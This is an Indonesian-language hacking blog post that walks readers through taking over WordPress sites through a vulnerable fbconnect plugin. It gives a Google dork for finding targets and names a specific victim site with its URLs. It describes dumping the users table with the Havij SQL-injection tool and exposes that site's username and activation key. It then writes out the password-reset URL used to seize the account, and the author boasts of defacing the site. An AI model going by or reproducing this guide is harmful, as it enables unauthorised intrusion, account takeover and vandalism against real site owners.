Cara Hack Wordpress ( SQL Injection+Reset Password )

Aduchhh udah lama skali kita t pernah b posting ini di blog..heheheheh
Oke kawan kawan ku smuanya pecinta Hacked Berikut saya tuangkan Ilmu saya sedikit,,,maaf kalau kurang jelas..soalx ane juga newbie ckckckckc....
Oke kali ini Ablam cyber t34m Akan Memberikan ILMU Sesat hehehehe cekidot....

Kali ini saya menulis tentang keamanan di plugin WP,sebenarnya cukup banyak plugin wp yang rentan,tapi saya hanya membahas salah satunya saja.Ok tanpa banyak cingcong langsung aja deh...

peralatan yang dibutuhkan adalah:

1. Kompie terhubung internet
   
2. Havij
   
3. dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )
   
4. Kesabaran dalam mencari target
   
5. Rokok,Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe

saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian "userid=" di tambahin tulisan " fb" jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14 

kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu cari column user_login dan user_activation_key

heheh...dah ketemu tuh yang kita cari,

username:pico

Activation key: GBasuGIZFtbUjpP3MvWb

sekarang kita gunakan exploitnya yaitu 

wp-login.php?action=rp&key="kode aktivasi"&login="user login"

jadi alamatnya tadi dirubah seperti ini http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico

sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita

saya cukup ngedit home.php nya aja dah,hehehe

buseeeet hasilnya kelam banget dah...sory ya admin

Share Artikel :

Facebook Twitter Google+

Berlanggan

Berlangganan posting: Daftarkan alamat email Anda untuk memperoleh umpan posting terbaru langsung ke kotak masuk pesan dari FajriAndaviar.